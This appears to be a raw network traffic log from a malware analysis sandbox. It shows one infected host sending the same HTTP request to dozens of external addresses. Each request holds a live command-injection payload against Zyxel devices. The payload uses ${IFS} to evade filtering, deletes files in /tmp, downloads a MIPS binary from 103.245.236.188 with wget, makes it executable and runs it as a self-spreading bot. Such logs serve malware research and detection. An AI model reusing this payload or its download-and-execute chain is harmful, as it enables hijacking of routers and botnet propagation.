                                                Jan 12, 2024 18:24:26.623030901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2219192.168.2.135420034.159.53.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.623070002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2220192.168.2.135347258.3.140.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.623107910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2221192.168.2.1355250119.96.208.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.623133898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2222192.168.2.1341988202.26.167.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.623183012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2223192.168.2.1344352213.15.7.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.623217106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2224192.168.2.1335892218.25.148.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.623243093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2225192.168.2.1347084154.105.4.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.623277903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2226192.168.2.1336282185.183.168.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.623311996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2227192.168.2.135628269.106.114.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.623338938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2228192.168.2.1335430114.161.163.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.623400927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2229192.168.2.1352078200.104.176.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.623437881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2230192.168.2.1336602223.23.139.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.623452902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2231192.168.2.1354346213.83.26.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.623514891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2232192.168.2.1338506166.57.47.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.635270119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2233192.168.2.13361509.178.240.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.635328054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2234192.168.2.133737486.225.12.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.635402918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2235192.168.2.1343878165.150.50.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.635454893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2236192.168.2.134282297.191.220.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.635528088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2237192.168.2.1343528204.192.201.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.635529995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2238192.168.2.1340336132.246.115.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.635611057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2239192.168.2.1337006150.241.131.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.635651112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2240192.168.2.135009659.29.202.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.635701895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2241192.168.2.1355442175.189.213.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.635752916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2242192.168.2.134121818.218.69.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.635824919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2243192.168.2.1336108164.175.29.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.635880947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2244192.168.2.1356386220.56.129.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.635910034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2245192.168.2.135526842.191.72.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.635972023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2246192.168.2.1342930141.172.218.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636035919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2247192.168.2.1340602102.83.172.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636086941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2248192.168.2.1359760167.0.56.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636125088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2249192.168.2.1333106130.186.67.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636163950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2250192.168.2.1352642187.228.30.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636218071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2251192.168.2.1355250189.180.173.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636279106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2252192.168.2.134186089.24.219.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636312962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2253192.168.2.1336522186.96.254.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636358023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2254192.168.2.1339308112.135.136.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636416912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2255192.168.2.1334142116.173.186.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636475086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2256192.168.2.133420272.233.0.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636523008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2257192.168.2.1334410107.120.164.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636573076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2258192.168.2.1341636168.64.50.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636617899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2259192.168.2.134421242.206.240.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636657953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2260192.168.2.134172281.188.137.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636704922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2261192.168.2.1360756177.54.8.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636776924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2262192.168.2.134082262.51.174.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636840105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2263192.168.2.1348618173.157.167.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636908054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2264192.168.2.133868223.246.118.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.636953115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2265192.168.2.1358130126.42.105.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.637012005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2266192.168.2.134649212.197.4.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.637049913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2267192.168.2.13553745.66.136.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.637098074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2268192.168.2.1356424205.58.23.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.637170076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2269192.168.2.1354026207.182.205.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.637207985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2270192.168.2.135629098.60.35.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.637264013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2271192.168.2.135235253.224.101.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.637305975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2272192.168.2.1346840138.174.165.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.637331009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2273192.168.2.1336396204.216.189.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.637391090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2274192.168.2.1356294204.45.75.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.637454987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2275192.168.2.134187847.49.7.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.637506962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2276192.168.2.1351296221.239.59.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.637551069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2277192.168.2.1352136175.95.51.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.637603045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2278192.168.2.1337294100.150.0.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.637665987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2279192.168.2.133493879.213.11.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.637739897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2280192.168.2.1343430185.252.136.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.637810946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2281192.168.2.1338096173.187.211.153443
                                                TimestampBytes transferredDirectionData
